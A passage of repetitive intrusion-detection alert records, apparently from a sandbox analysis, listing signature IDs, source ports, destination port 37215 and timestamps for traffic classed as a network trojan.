                SID:2835222
                Source Port:38920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790436
                SID:2829579
                Source Port:51742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878578
                SID:2835222
                Source Port:48460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848675
                SID:2835222
                Source Port:54196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762062
                SID:2835222
                Source Port:45710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968751
                SID:2835222
                Source Port:55024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625305
                SID:2829579
                Source Port:48394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201873
                SID:2835222
                Source Port:39774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859990
                SID:2835222
                Source Port:54112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224853
                SID:2829579
                Source Port:58404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011091
                SID:2835222
                Source Port:59402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725366
                SID:2835222
                Source Port:35072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411190
                SID:2835222
                Source Port:57636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679194
                SID:2829579
                Source Port:43730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291253
                SID:2829579
                Source Port:56304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073997
                SID:2829579
                Source Port:57750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966933
                SID:2829579
                Source Port:51008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110890
                SID:2835222
                Source Port:50088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715180
                SID:2835222
                Source Port:44070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518534
                SID:2829579
                Source Port:46508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717681
                SID:2835222
                Source Port:58656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641859
                SID:2829579
                Source Port:38198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051021
                SID:2835222
                Source Port:42682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941756
                SID:2835222
                Source Port:42188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293709
                SID:2835222
                Source Port:50898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242473
                SID:2835222
                Source Port:50724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668395
                SID:2829579
                Source Port:47378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775502
                SID:2835222
                Source Port:51288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024763
                SID:2835222
                Source Port:52320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699798
                SID:2835222
                Source Port:37542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027932
                SID:2829579
                Source Port:57710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977596
                SID:2835222
                Source Port:59488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776310
                SID:2835222
                Source Port:35200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615916
                SID:2829579
                Source Port:60872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759566
                SID:2835222
                Source Port:37682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763491
                SID:2835222
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567483
                SID:2835222
                Source Port:52350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760908
                SID:2835222
                Source Port:56130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518910
                SID:2829579
                Source Port:47844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860242
                SID:2835222
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018143
                SID:2835222
                Source Port:45512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676562
                SID:2829579
                Source Port:51364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969119
                SID:2829579
                Source Port:51992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827653
                SID:2829579
                Source Port:56882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134924
                SID:2829579
                Source Port:39554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858038
                SID:2835222
                Source Port:59976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662864
                SID:2835222
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991041
                SID:2829579
                Source Port:34588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685022
                SID:2835222
                Source Port:45944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667673
                SID:2829579
                Source Port:50114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056602
                SID:2835222
                Source Port:35306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056707
                SID:2829579
                Source Port:33002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419728
                SID:2829579
                Source Port:53022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337880
                SID:2829579
                Source Port:57946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989461
                SID:2835222
                Source Port:35924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544518
                SID:2835222
                Source Port:47810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969057
                SID:2835222
                Source Port:55000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502447
                SID:2829579
                Source Port:46418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015154
                SID:2835222
                Source Port:46984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812574
                SID:2835222
                Source Port:54780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968720
                SID:2829579
                Source Port:41760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762071
                SID:2829579
                Source Port:35644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503463
                SID:2835222
                Source Port:58804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718162
                SID:2829579
                Source Port:48748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226517
                SID:2829579
                Source Port:54112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149280
                SID:2829579
                Source Port:40736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084773
                SID:2829579
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179487
                SID:2829579
                Source Port:43786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503569
                SID:2835222
                Source Port:42138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991487
                SID:2835222
                Source Port:49894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726421
                SID:2835222
                Source Port:33086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111335
                SID:2835222
                Source Port:39898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667935
                SID:2835222
                Source Port:57912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805334
                SID:2829579
                Source Port:38934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702113
                SID:2835222
                Source Port:51364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763245
                SID:2835222
                Source Port:52834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548697
                SID:2829579
                Source Port:41150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986397
                SID:2829579
                Source Port:56936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848254
                SID:2835222
                Source Port:53976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092814
                SID:2835222
                Source Port:52844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159983
                SID:2829579
                Source Port:59524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763168
                SID:2829579
                Source Port:40730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660742
                SID:2829579
                Source Port:36432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803677
                SID:2835222
                Source Port:34248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862187
                SID:2835222
                Source Port:34200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804004
                SID:2829579
                Source Port:58694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324864
                SID:2829579
                Source Port:45828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776331
                SID:2835222
                Source Port:46256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051460
                SID:2829579
                Source Port:41696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681308
                SID:2835222
                Source Port:38644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071204
                SID:2835222
                Source Port:50974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293665
                SID:2835222
                Source Port:39610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453866
                SID:2829579
                Source Port:36816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276690
                SID:2835222
                Source Port:57892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548978
                SID:2835222
                Source Port:45262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.582132
                SID:2829579
                Source Port:46012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201497
                SID:2829579
                Source Port:47164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150443
                SID:2829579
                Source Port:47410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369296
                SID:2835222
                Source Port:54988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672868
                SID:2829579
                Source Port:36776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679304
                SID:2835222
                Source Port:38290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881434
                SID:2835222
                Source Port:52674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728284
                SID:2835222
                Source Port:54158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850643
                SID:2829579
                Source Port:49970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419677
                SID:2835222
                Source Port:47918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092919
                SID:2829579
                Source Port:47648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792405
                SID:2835222
                Source Port:57406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149272
                SID:2835222
                Source Port:54756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323872
                SID:2829579
                Source Port:45718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.387158
                SID:2829579
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727113
                SID:2829579
                Source Port:58590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198852
                SID:2829579
                Source Port:39240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861318
                SID:2829579
                Source Port:58836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030612
                SID:2829579
                Source Port:47500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644074
                SID:2835222
                Source Port:35266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143237
                SID:2829579
                Source Port:42398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230353
                SID:2829579
                Source Port:36944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134976
                SID:2835222
                Source Port:42984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881950
                SID:2829579
                Source Port:46004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134223
                SID:2835222
                Source Port:58766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625386
                SID:2829579
                Source Port:37872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203095
                SID:2829579
                Source Port:59844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275958
                SID:2835222
                Source Port:36582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.404346
                SID:2829579
                Source Port:53130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246406
                SID:2829579
                Source Port:58670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859021
                SID:2829579
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365029
                SID:2835222
                Source Port:58048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544628
                SID:2829579
                Source Port:46442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568764
                SID:2835222
                Source Port:50712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917307
                SID:2829579
                Source Port:42024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032120
                SID:2829579
                Source Port:57544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567360
                SID:2835222
                Source Port:42090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678461
                SID:2835222
                Source Port:54130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143496
                SID:2835222
                Source Port:37748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719072
                SID:2829579
                Source Port:52984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183950
                SID:2835222
                Source Port:52846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250908
                SID:2829579
                Source Port:59166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016696
                SID:2829579
                Source Port:37636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072868
                SID:2835222
                Source Port:59528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452846
                SID:2829579
                Source Port:57660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452403
                SID:2835222
                Source Port:40814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082485
                SID:2835222
                Source Port:48862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181969
                SID:2835222
                Source Port:34098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880280
                SID:2835222
                Source Port:57154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411740
                SID:2829579
                Source Port:38260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501327
                SID:2835222
                Source Port:35294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971768
                SID:2829579
                Source Port:59670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985397
                SID:2829579
                Source Port:58260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643021
                SID:2835222
                Source Port:48328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913825
                SID:2835222
                Source Port:58506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367516
                SID:2835222
                Source Port:33152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831406
                SID:2835222
                Source Port:35984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999967
                SID:2829579
                Source Port:44372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132643
                SID:2829579
                Source Port:36350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808715
                SID:2829579
                Source Port:34082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274323
                SID:2829579
                Source Port:53262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917773
                SID:2835222
                Source Port:38396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984437
                SID:2835222
                Source Port:40872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663675
                SID:2835222
                Source Port:41358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244581
                SID:2829579
                Source Port:52380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024895
                SID:2829579
                Source Port:50434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660395
                SID:2835222
                Source Port:44308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074708
                SID:2829579
                Source Port:59330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453086
                SID:2835222
                Source Port:42200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917706
                SID:2829579
                Source Port:39534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978629
                SID:2829579
                Source Port:58482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134440
                SID:2829579
                Source Port:47354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986110
                SID:2829579
                Source Port:41618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201232
                SID:2829579
                Source Port:36892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291871
                SID:2835222
                Source Port:50604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367119
                SID:2829579
                Source Port:34218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110996
                SID:2829579
                Source Port:58286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807707
                SID:2835222
                Source Port:56164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504222
                SID:2835222
                Source Port:38260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115996
                SID:2835222
                Source Port:50436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504853
                SID:2835222
                Source Port:48052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831514
                SID:2829579
                Source Port:43984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.335970
                SID:2835222
                Source Port:50436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900189
                SID:2835222
                Source Port:56208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978071
                SID:2829579
                Source Port:46108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943109
                SID:2829579
                Source Port:37424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410588
                SID:2829579
                Source Port:55388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423723
                SID:2829579
                Source Port:35500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001543
                SID:2835222
                Source Port:46262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808016
                SID:2835222
                Source Port:41484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700161
                SID:2835222
                Source Port:33548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663310
                SID:2835222
                Source Port:39164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183933
                SID:2835222
                Source Port:42668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092400
                SID:2829579
                Source Port:36108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547936
                SID:2829579
                Source Port:56312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470329
                SID:2829579
                Source Port:50632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368264
                SID:2829579
                Source Port:51394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383090
                SID:2835222
                Source Port:53512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568643
                SID:2835222
                Source Port:43744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276436
                SID:2829579
                Source Port:48118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294977
                SID:2829579
                Source Port:33122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160634
                SID:2835222
                Source Port:54594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020828
                SID:2835222
                Source Port:58676
                Destination Port:37215
